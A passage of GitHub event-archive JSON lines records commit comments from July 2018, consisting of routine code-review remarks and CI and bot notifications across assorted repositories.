test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:16:17Z"}
{"id":"8014892591","type":"CommitCommentEvent","actor":{"login":"moonjenny"},"repo":{"name":"moonjenny/snt"},"payload":{"comment":{"id":29825544,"position":5,"line":1555,"path":"contents/2015_t/resources/js/jquery-mobile.ui.js","commit_id":"af270214362cfef23df0e1958d0fbf889c0251cb","created_at":"2018-07-25T08:17:04Z","updated_at":"2018-07-25T08:17:04Z","author_association":"OWNER","body":"캐시 사용하기 버튼 관련 추가"}},"created_at":"2018-07-25T08:17:04Z"}
{"id":"8014907719","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825577,"position":120,"line":85,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:20:12Z","updated_at":"2018-07-25T08:20:12Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-25T08:20:12Z"}
{"id":"8014908307","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29825581,"position":28,"line":18,"path":"lesson 1/discriminant.rb","commit_id":"3ffb9199678f2b7151156414203d861eb3affc73","created_at":"2018-07-25T08:20:18Z","updated_at":"2018-07-25T08:20:18Z","author_association":"NONE","body":"Math.sqrt(d) тоже надо вынести в переменную, сейчас ты два раза вычисляешь значение"}},"created_at":"2018-07-25T08:20:18Z"}
{"id":"8014908721","type":"CommitCommentEvent","actor":{"login":"biochem-fan"},"repo":{"name":"cctbx/cctbx_project"},"payload":{"comment":{"id":29825584,"position":null,"line":null,"path":null,"commit_id":"71a4ab94a7910256c178baf2e275fd8165cd3973","created_at":"2018-07-25T08:20:22Z","updated_at":"2018-07-25T08:20:22Z","author_association":"NONE","body":"@graeme-winter @phyy-nx Thank you very much for your help. Now I fixed the code. I will join the cctbx-commit mailing list to receive these logs."}},"created_at":"2018-07-25T08:20:22Z"}
{"id":"8014914447","type":"CommitCommentEvent","actor":{"login":"JeonggukYu"},"repo":{"name":"JeonggukYu/Pro"},"payload":{"comment":{"id":29825594,"position":null,"line":null,"path":null,"commit_id":"cad60d1636560c8784cadf51cf92f6d50297f931","created_at":"2018-07-25T08:21:28Z","updated_at":"2018-07-25T08:21:28Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-25T08:21:28Z"}
{"id":"8014914583","type":"CommitCommentEvent","actor":{"login":"martonsereg"},"repo":{"name":"banzaicloud/productinfo"},"payload":{"comment":{"id":29825595,"position":18,"line":40,"path":"internal/app/productinfo/api/routes.go","commit_id":"2d6e30eebbb647e66f58c67b38fa926c1c974cca","created_at":"2018-07-25T08:21:29Z","updated_at":"2018-07-25T08:21:29Z","author_association":"MEMBER","body":"please change the metric name name according to these naming conventions: https://prometheus.io/docs/practices/naming/\r\n\r\n- `last` shouldn't be a part of the metric name, because it doesn't make sense in the prometheus time series db\r\n- prefix should be the same for the two metrics: `scrape`\r\n- it should include the unit: `seconds`\r\n\r\nso something like `scrape_duration_seconds` would make sense"}},"created_at":"2018-07-25T08:21:29Z"}
{"id":"8014917069","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"v3rba/RubyWay"},"payload":{"comment":{"id":29825598,"position":21,"line":16,"path":"lesson 1/triangle2.rb","commit_id":"3ffb9199678f2b7151156414203d861eb3affc73","created_at":"2018-07-25T08:21:58Z","updated_at":"2018-07-25T08:21:58Z","author_association":"NONE","body":"проблема с табом, нужно поправить здесь тоже"}},"created_at":"2018-07-25T08:21:58Z"}
{"id":"8014917970","type":"CommitCommentEvent","actor":{"login":"WangMal"},"repo":{"name":"Houlbny/3D_Unet_Seg"},"payload":{"comment":{"id":29825600,"position":null,"line":null,"path":null,"commit_id":"cf5aba3f8f71c9276142655a6d1401a1d7f1d7bf","created_at":"2018-07-25T08:22:08Z","updated_at":"2018-07-25T08:22:08Z","author_association":"NONE","body":"houl NB"}},"created_at":"2018-07-25T08:22:08Z"}
{"id":"8014918712","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825602,"position":52,"line":36,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:22:16Z","updated_at":"2018-07-25T08:22:16Z","author_association":"COLLABORATOR","body":"i will use this later for owner, to control members and ids"}},"created_at":"2018-07-25T08:22:16Z"}
{"id":"8014920463","type":"CommitCommentEvent","actor":{"login":"renemilk"},"repo":{"name":"pymor/pymor"},"payload":{"comment":{"id":29825605,"position":null,"line":null,"path":null,"commit_id":"3b7f6ed7d34d6fed5eeaaa4011dabdc8e045834e","created_at":"2018-07-25T08:22:38Z","updated_at":"2018-07-25T08:22:38Z","author_association":"MEMBER","body":"refs #455 "}},"created_at":"2018-07-25T08:22:38Z"}
{"id":"8014920509","type":"CommitCommentEvent","actor":{"login":"barani1980"},"repo":{"name":"barani1980/DevopsBarani"},"payload":{"comment":{"id":29825606,"position":null,"line":null,"path":null,"commit_id":"71ea1c5fc5d2373b639e6a629b842cf7ae5bc514","created_at":"2018-07-25T08:22:38Z","updated_at":"2018-07-25T08:22:38Z","author_association":"OWNER","body":"Updating directly on the master branch on the central repository"}},"created_at":"2018-07-25T08:22:38Z"}
{"id":"8014921873","type":"CommitCommentEvent","actor":{"login":"soubhik-khan"},"repo":{"name":"crdroidandroid/android_device_oneplus_msm8998-common"},"payload":{"comment":{"id":29825607,"position":null,"line":null,"path":null,"commit_id":"969a0289b69e19ec4c425ed1653825fa488acfc9","created_at":"2018-07-25T08:22:55Z","updated_at":"2018-07-25T08:22:55Z","author_association":"MEMBER","body":"mido is affected.. random reboots due to GPS SEGFAULT"}},"created_at":"2018-07-25T08:22:55Z"}
{"id":"8014925068","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825612,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-25T08:23:34Z","updated_at":"2018-07-25T08:23:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:23:34Z"}
{"id":"8014955160","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825687,"position":182,"line":97,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:29:32Z","updated_at":"2018-07-25T08:29:32Z","author_association":"COLLABORATOR","body":"will be removed after testing phase"}},"created_at":"2018-07-25T08:29:32Z"}
{"id":"8014955951","type":"CommitCommentEvent","actor":{"login":"KargJonas"},"repo":{"name":"KargJonas/tag.js"},"payload":{"comment":{"id":29825691,"position":null,"line":null,"path":null,"commit_id":"079fd0571c905f871c77ff3b9284091762925398","created_at":"2018-07-25T08:29:41Z","updated_at":"2018-07-25T08:29:41Z","author_association":"OWNER","body":"README fix"}},"created_at":"2018-07-25T08:29:41Z"}
{"id":"8014956663","type":"CommitCommentEvent","actor":{"login":"Roconda"},"repo":{"name":"O2MC/dimml-mobile-sdk"},"payload":{"comment":{"id":29825693,"position":null,"line":null,"path":null,"commit_id":"cfdf3c9ed0ad5af5b37193fe2ba00051eaa30923","created_at":"2018-07-25T08:29:49Z","updated_at":"2018-07-25T08:29:49Z","author_association":"COLLABORATOR","body":"Great remark @EdwinVanRooij. Will create an issue regarding to this discussion we had yesterday since we have more optional parameters (eg. event.properties)."}},"created_at":"2018-07-25T08:29:49Z"}
{"id":"8014959011","type":"CommitCommentEvent","actor":{"login":"abdulfa"},"repo":{"name":"abdulfa/https-github.com-users-abdulfa-emails-56241712-confirm_verification-https-s3.amazonaws.com-outli"},"payload":{"comment":{"id":29825697,"position":null,"line":null,"path":null,"commit_id":"2ea4ff8ebe448d255b80e09637195399b11734eb","created_at":"2018-07-25T08:30:16Z","updated_at":"2018-07-25T08:30:16Z","author_association":"OWNER","body":"https-github.com-users-abdulfa-emails-56241712-confirm_verification-https-s3.amazonaws.com-outli"}},"created_at":"2018-07-25T08:30:16Z"}
{"id":"8014961307","type":"CommitCommentEvent","actor":{"login":"ElementalCrisis"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29825705,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-25T08:30:43Z","updated_at":"2018-07-25T08:30:43Z","author_association":"MEMBER","body":"Not yet, still a WIP. "}},"created_at":"2018-07-25T08:30:43Z"}
{"id":"8014961740","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825706,"position":195,"line":110,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:30:48Z","updated_at":"2018-07-25T08:30:48Z","author_association":"COLLABORATOR","body":"no. this is comfirmed by thanh dao"}},"created_at":"2018-07-25T08:30:48Z"}
{"id":"8014961983","type":"CommitCommentEvent","actor":{"login":"rwakulszowa"},"repo":{"name":"kxkaro/Skater_pygame"},"payload":{"comment":{"id":29825707,"position":1,"line":1,"path":"skater/gameboard.py","commit_id":"6b3e4eacadd4dc98b26f32619ae53cf511a2a493","created_at":"2018-07-25T08:30:51Z","updated_at":"2018-07-25T08:30:51Z","author_association":"CONTRIBUTOR","body":"Tak na dobrą sprawę to te importy nie są tutaj konieczne. Ale to drobiazg (przynajmniej na razie).\r\n\r\nJeśli w przyszłości w klasie `Obstacle` będzie chciała zaimportować `Gameboard`, podczas gdy `Gameboard` importuje `Obstacle`, powstanie cykliczna zależność i program nie zadziała. Ale na razie to nie problem."}},"created_at":"2018-07-25T08:30:51Z"}
{"id":"8014963802","type":"CommitCommentEvent","actor":{"login":"KonradJPE"},"repo":{"name":"MEN-Mikro-Elektronik/13MD05-90"},"payload":{"comment":{"id":29825711,"position":null,"line":null,"path":null,"commit_id":"cb29ef25bdfa892bf56e811d78126f92aa2a36f6","created_at":"2018-07-25T08:31:13Z","updated_at":"2018-07-25T08:31:13Z","author_association":"CONTRIBUTOR","body":"In fact, branch of submodule 'DRIVERS/BBIS/A12' has been switched to 'jpe-dev'. \r\n.gitmodule file was fixed in commit 5353317. "}},"created_at":"2018-07-25T08:31:13Z"}
{"id":"8014968568","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825720,"position":208,"line":123,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:32:09Z","updated_at":"2018-07-25T08:32:09Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-25T08:32:09Z"}
{"id":"8014970177","type":"CommitCommentEvent","actor":{"login":"victortaloud"},"repo":{"name":"victortaloud/cloud_composer"},"payload":{"comment":{"id":29825724,"position":254,"line":226,"path":"traitements.py","commit_id":"b7356805d2a09950d40e29b21b19161a0ee5e737","created_at":"2018-07-25T08:32:27Z","updated_at":"2018-07-25T08:32:27Z","author_association":"OWNER","body":"filtrer sur France aussi \r\n"}},"created_at":"2018-07-25T08:32:27Z"}
{"id":"8014970470","type":"CommitCommentEvent","actor":{"login":"selvagsz"},"repo":{"name":"tradegecko/qunit-dom"},"payload":{"comment":{"id":29825726,"position":12,"line":312,"path":"lib/assertions.js","commit_id":"dab7bfb978480ea063248dbc050eac818e2eaddc","created_at":"2018-07-25T08:32:31Z","updated_at":"2018-07-25T08:32:31Z","author_association":"COLLABORATOR","body":"should support both"}},"created_at":"2018-07-25T08:32:31Z"}
{"id":"8014971190","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29825728,"position":11,"line":8,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"23b72843845deb9903f472bc5d2ec5122c1dfc82","created_at":"2018-07-25T08:32:40Z","updated_at":"2018-07-25T08:32:40Z","author_association":"OWNER","body":"Ну я ока не понимаю какой тип должен быть у поля myOut и nyPrintln"}},"created_at":"2018-07-25T08:32:40Z"}
{"id":"8014974384","type":"CommitCommentEvent","actor":{"login":"Cyclodex"},"repo":{"name":"LucasBassetti/react-simple-chatbot"},"payload":{"comment":{"id":29825733,"position":4,"line":7,"path":"webpack.config.prod.js","commit_id":"78554d122578bda583ccd565716b2cad3cb0d872","created_at":"2018-07-25T08:33:21Z","updated_at":"2018-07-25T08:33:21Z","author_association":"NONE","body":"@LucasBassetti , can you explain me why this is now external?\r\nI see the doc (https://webpack.js.org/configuration/externals/) but don't understand right now, why we can make this external now? Thanks for any feedback"}},"created_at":"2018-07-25T08:33:21Z"}
{"id":"8014974706","type":"CommitCommentEvent","actor":{"login":"bhangalepiyush"},"repo":{"name":"dirigeants/klasa-pieces"},"payload":{"comment":{"id":29825734,"position":null,"line":null,"path":null,"commit_id":"cef02dd79dd5cb8681ba7677452d0af00a0f3433","created_at":"2018-07-25T08:33:25Z","updated_at":"2018-07-25T08:33:25Z","author_association":"NONE","body":"Blame <@157797566833098752> 🤓😛"}},"created_at":"2018-07-25T08:33:25Z"}
{"id":"8014974989","type":"CommitCommentEvent","actor":{"login":"fabled"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29825735,"position":null,"line":null,"path":null,"commit_id":"a109caf76a9432a80ba408a5250aa454fc8bee0c","created_at":"2018-07-25T08:33:29Z","updated_at":"2018-07-25T08:33:29Z","author_association":"CONTRIBUTOR","body":"This header is not confirming to any standard. It's generally availably in glibc and BSDs, but from conformance point of view it's bogus. Also the things it defines are all starting with underscore, meaning they are implementation internal and should not be used in application code.\r\n\r\nIt generates warning, and should still pass compilation of software. If it is promoted the an error the application is using -Werror to make warnings to errors. I recommend disabling Werror or patching the application to not use this header. "}},"created_at":"2018-07-25T08:33:29Z"}
{"id":"8014976753","type":"CommitCommentEvent","actor":{"login":"VincentWangcf"},"repo":{"name":"VincentWangcf/Hello"},"payload":{"comment":{"id":29825736,"position":null,"line":null,"path":null,"commit_id":"587a69d67a5a837d0e72d3e7df4fd0e8cfd372fd","created_at":"2018-07-25T08:33:49Z","updated_at":"2018-07-25T08:33:49Z","author_association":"OWNER","body":"v"}},"created_at":"2018-07-25T08:33:49Z"}
{"id":"8014977455","type":"CommitCommentEvent","actor":{"login":"OmarAhmadien"},"repo":{"name":"OmarAhmadien/Vehicle-Detection"},"payload":{"comment":{"id":29825739,"position":null,"line":null,"path":null,"commit_id":"ccd32e03245bdfec1237da9b5ad5a425d0fafe13","created_at":"2018-07-25T08:33:57Z","updated_at":"2018-07-25T08:33:57Z","author_association":"OWNER","body":"![trainingset_samples](https://user-images.githubusercontent.com/17507035/43189144-9b11b4da-8ffe-11e8-9d4e-3608c495e734.png)\r\n"}},"created_at":"2018-07-25T08:33:57Z"}
{"id":"8014978392","type":"CommitCommentEvent","actor":{"login":"siddardhak"},"repo":{"name":"Bob-ho/AFL-Almanac-B"},"payload":{"comment":{"id":29825741,"position":null,"line":null,"path":null,"commit_id":"d2e39e626cd3f8e83c6b2146a800bbec6957f5be","created_at":"2018-07-25T08:34:08Z","updated_at":"2018-07-25T08:34:08Z","author_association":"COLLABORATOR","body":"file"}},"created_at":"2018-07-25T08:34:08Z"}
{"id":"8014978825","type":"CommitCommentEvent","actor":{"login":"mike0022"},"repo":{"name":"mike0022/Security-System"},"payload":{"comment":{"id":29825742,"position":null,"line":null,"path":null,"commit_id":"023f8325b987268e3c895cb78a196645c971d374","created_at":"2018-07-25T08:34:12Z","updated_at":"2018-07-25T08:34:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [git](https://trello.com/c/j3aHy79j/79-git)"}},"created_at":"2018-07-25T08:34:12Z"}
{"id":"8014979194","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29825743,"position":null,"line":null,"path":null,"commit_id":"a0abaf804d8fbf3b91279f2fed8e436d2388389f","created_at":"2018-07-25T08:34:16Z","updated_at":"2018-07-25T08:34:16Z","author_association":"COLLABORATOR","body":"Puzzle `1215-032c8ff3` disappeared from [`src/main/java/com/zerocracy/pm/Claims.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/Claims.java), that's why I closed #1246. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-25T08:34:16Z"}
{"id":"8014979386","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29825745,"position":null,"line":null,"path":null,"commit_id":"a0abaf804d8fbf3b91279f2fed8e436d2388389f","created_at":"2018-07-25T08:34:18Z","updated_at":"2018-07-25T08:34:18Z","author_association":"COLLABORATOR","body":"Puzzle `773-d4aeb93a` disappeared from [`src/main/java/com/zerocracy/pm/Claims.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/Claims.java), that's why I closed #1463. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-25T08:34:18Z"}
{"id":"8014981292","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29825749,"position":null,"line":null,"path":null,"commit_id":"a0abaf804d8fbf3b91279f2fed8e436d2388389f","created_at":"2018-07-25T08:34:41Z","updated_at":"2018-07-25T08:34:41Z","author_association":"COLLABORATOR","body":"Puzzle `1436-66b5a846` discovered in   [`src/main/java/com/zerocracy/pm/Claims.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/Claims.java)   and submitted as #1480. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-25T08:34:41Z"}
{"id":"8014982041","type":"CommitCommentEvent","actor":{"login":"enneadurango"},"repo":{"name":"mike0022/Security-System"},"payload":{"comment":{"id":29825750,"position":null,"line":null,"path":null,"commit_id":"22a572934c7d9f938e70b85905c3dade60b5b664","created_at":"2018-07-25T08:34:50Z","updated_at":"2018-07-25T08:34:50Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [git](https://trello.com/c/j3aHy79j/79-git)"}},"created_at":"2018-07-25T08:34:50Z"}
{"id":"8014982814","type":"CommitCommentEvent","actor":{"login":"amuammarzein"},"repo":{"name":"amuammarzein/SlimWebservice"},"payload":{"comment":{"id":29825752,"position":null,"line":null,"path":null,"commit_id":"cf73beb37c0d2a5be8cea2d1e15d692a37674459","created_at":"2018-07-25T08:34:59Z","updated_at":"2018-07-25T08:34:59Z","author_association":"OWNER","body":"benerke sek ras routes e"}},"created_at":"2018-07-25T08:34:59Z"}
{"id":"8014983920","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825755,"position":219,"line":134,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:35:12Z","updated_at":"2018-07-25T08:35:12Z","author_association":"COLLABORATOR","body":"changed to CreatedSuccess"}},"created_at":"2018-07-25T08:35:12Z"}
{"id":"8014990853","type":"CommitCommentEvent","actor":{"login":"enneadurango"},"repo":{"name":"enneadurango/Security-System"},"payload":{"comment":{"id":29825765,"position":null,"line":null,"path":null,"commit_id":"023f8325b987268e3c895cb78a196645c971d374","created_at":"2018-07-25T08:36:34Z","updated_at":"2018-07-25T08:36:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Building a Face Recognition Dataset and Face Recognition](https://trello.com/c/xkyi0mxZ/81-building-a-face-recognition-dataset-and-face-recognition)"}},"created_at":"2018-07-25T08:36:34Z"}
{"id":"8014999766","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29825779,"position":null,"line":null,"path":null,"commit_id":"558076017cfc9d81b60c3091b096307cce30644a","created_at":"2018-07-25T08:38:20Z","updated_at":"2018-07-25T08:38:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-937](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-937).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-937-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T08:38:20Z"}
{"id":"8014999940","type":"CommitCommentEvent","actor":{"login":"GitTest1Acc"},"repo":{"name":"GitTest1Acc/TestRepoPublic"},"payload":{"comment":{"id":29825780,"position":null,"line":null,"path":null,"commit_id":"bc4471383062d2b21e426e539a9ce245d254db4b","created_at":"2018-07-25T08:38:21Z","updated_at":"2018-07-25T08:38:21Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been rejected.<br>Rejected by test1"}},"created_at":"2018-07-25T08:38:21Z"}
{"id":"8015000407","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29825783,"position":null,"line":null,"path":null,"commit_id":"b9992f4a08574efb47b6e6cd80eb1e888b9a1ede","created_at":"2018-07-25T08:38:26Z","updated_at":"2018-07-25T08:38:26Z","author_association":"MEMBER","body":"https://github.com/ant-design/ant-design/issues/11454"}},"created_at":"2018-07-25T08:38:26Z"}
{"id":"8015000897","type":"CommitCommentEvent","actor":{"login":"bestboyvn87"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825784,"position":228,"line":143,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T08:38:32Z","updated_at":"2018-07-25T08:38:32Z","author_association":"COLLABORATOR","body":"done"}},"created_at":"2018-07-25T08:38:32Z"}
{"id":"8015002258","type":"CommitCommentEvent","actor":{"login":"GitTest1Acc"},"repo":{"name":"GitTest1Acc/TestRepoPublic"},"payload":{"comment":{"id":29825786,"position":null,"line":null,"path":null,"commit_id":"ec503e553ab610b9caac8dfe0b7ce22af49d9c36","created_at":"2018-07-25T08:38:48Z","updated_at":"2018-07-25T08:38:48Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://109.195.189.78:40102/ui#review:id=6)"}},"created_at":"2018-07-25T08:38:48Z"}
{"id":"8015002297","type":"CommitCommentEvent","actor":{"login":"GitTest1Acc"},"repo":{"name":"GitTest1Acc/TestRepoPublic"},"payload":{"comment":{"id":29825787,"position":null,"line":null,"path":null,"commit_id":"eb1ced6738896095ed4331b437bb8dee99c30c36","created_at":"2018-07-25T08:38:48Z","updated_at":"2018-07-25T08:38:48Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://109.195.189.78:40102/ui#review:id=6)"}},"created_at":"2018-07-25T08:38:48Z"}
{"id":"8015005438","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29825793,"position":16,"line":52,"path":"addons/account/wizard/setup_wizards.py","commit_id":"b30fed7a7bd9a26406c23b7ef19590df50be6c06","created_at":"2018-07-25T08:39:24Z","updated_at":"2018-07-25T08:39:24Z","author_association":"CONTRIBUTOR","body":"@oco-odoo @qdp-odoo \r\n\r\nThis _inherits doesn't define a Many2one field 'res_partner_bank_id', leading to the following logs in saas-11.4 and master: ``2018-07-25 08:36:15,979 25015 INFO test odoo.models: Missing many2one field definition for _inherits reference \"res_partner_bank_id\" in \"account.setup.bank.manual.config\", using default one.``\r\n\r\nCould you please fix ? \r\n\r\nThanks.\r\n "}},"created_at":"2018-07-25T08:39:24Z"}
{"id":"8015005711","type":"CommitCommentEvent","actor":{"login":"fengzee-me"},"repo":{"name":"evernote/android-job"},"payload":{"comment":{"id":29825795,"position":null,"line":null,"path":null,"commit_id":"d4efa10e1e2ddf5a6cacb22935c918bce478a65f","created_at":"2018-07-25T08:39:27Z","updated_at":"2018-07-25T08:39:27Z","author_association":"NONE","body":"I would consider this changeset more a mitigation than a fix. The timeout of 3 seconds is changed to 10 seconds. And in (the rare) case it still times out, the `NullPointerException` crash is converted to an `IllegalStateException` crash (if calling code does not catch it). I think the root cause of this issue is the initialization of JobStorage being too slow. I cannot think of any simple way to really fix this without substantial change. Compared to breaking the implicit law that getJobStorage() never returns null (or throws an exception), I would rather remove the timeout and just let getJobStorage() block (for a long time) even if it causes an ANR issue. However this is just my opinion."}},"created_at":"2018-07-25T08:39:27Z"}
{"id":"8015010335","type":"CommitCommentEvent","actor":{"login":"felipemoran"},"repo":{"name":"felipemoran/get-started-python"},"payload":{"comment":{"id":29825803,"position":null,"line":null,"path":null,"commit_id":"0a8fa98fa781430f2fcc7f1741f4d61b3601efc3","created_at":"2018-07-25T08:40:19Z","updated_at":"2018-07-25T08:40:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/bb723936-a2f8-428d-bc40-0670ef9c4242?env_id=ibm%3Ayp%3Aeu-gb \"test_toolchain_3\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/5d773d13-3e84-4c94-871e-3f81444267fd?env_id=ibm%3Ayp%3Aeu-gb \"test_pipeline\") deployed [get-started-python](https://github.com/felipemoran/get-started-python/releases/tag/deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180725-084018 \"deploy-ibm-yp-eu-gb-felipe.moran-correa-meyer-test-20180725-084018\") to [test](https://console.bluemix.net/apps/5f8de124-3481-4be8-9d3c-fd79df55e290?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:felipe.moran-correa-meyer:test\"), including this commit"}},"created_at":"2018-07-25T08:40:19Z"}
{"id":"8015021752","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29825834,"position":null,"line":null,"path":null,"commit_id":"51d8358554dd31302734de46ae7a2de5fcf75f7d","created_at":"2018-07-25T08:42:33Z","updated_at":"2018-07-25T08:42:33Z","author_association":"OWNER","body":"junit test는 알아서 공부하라는 슨승님의 말씀때문에 일단 메인으로 하는 테스틉니다......"}},"created_at":"2018-07-25T08:42:33Z"}
{"id":"8015023886","type":"CommitCommentEvent","actor":{"login":"nlewo"},"repo":{"name":"rasta-rocket/contrail-controller"},"payload":{"comment":{"id":29825842,"position":null,"line":null,"path":null,"commit_id":"e4aabd8040d6e6e1cca7818ed0f8c3779437983a","created_at":"2018-07-25T08:42:58Z","updated_at":"2018-07-25T08:42:58Z","author_association":"NONE","body":"Otherwise, LGTM."}},"created_at":"2018-07-25T08:42:58Z"}
{"id":"8015024382","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29825843,"position":null,"line":null,"path":null,"commit_id":"497ad6c4c65b6363fe6ee786a8b68be29d9e6783","created_at":"2018-07-25T08:43:04Z","updated_at":"2018-07-25T08:43:04Z","author_association":"COLLABORATOR","body":"Puzzle `345-fd64d13a` disappeared from [`.drone.yml`](https://github.com/fidals/shopelectro/blob/master/.drone.yml), that's why I closed #352. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-25T08:43:04Z"}
{"id":"8015024513","type":"CommitCommentEvent","actor":{"login":"yashu6"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29825845,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-25T08:43:06Z","updated_at":"2018-07-25T08:43:06Z","author_association":"NONE","body":"this project is great"}},"created_at":"2018-07-25T08:43:06Z"}
{"id":"8015024605","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29825846,"position":null,"line":null,"path":null,"commit_id":"497ad6c4c65b6363fe6ee786a8b68be29d9e6783","created_at":"2018-07-25T08:43:07Z","updated_at":"2018-07-25T08:43:07Z","author_association":"COLLABORATOR","body":"Puzzle `352-4d0775ee` discovered in   [`.drone.yml`](  https://github.com/fidals/shopelectro/blob/master/.drone.yml)   and submitted as #448. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-25T08:43:07Z"}
